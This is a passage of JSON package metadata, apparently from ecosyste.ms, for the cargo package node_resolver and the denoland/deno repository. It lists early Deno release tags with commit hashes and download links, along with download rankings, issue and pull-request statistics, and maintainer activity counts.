wnload_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T07:00:04.290Z","dependent_packages_count":2,"downloads":592203,"downloads_period":"total","dependent_repos_count":13,"rankings":{"downloads":7.995974805262569,"dependent_repos_count":7.157718896586697,"dependent_packages_count":12.232206107154841,"stargazers_count":34.317665038953294,"forks_count":21.27497763197137,"docker_downloads_count":null,"average":16.595708495985754},"purl":"pkg:cargo/node_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/node_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/node_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/node_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste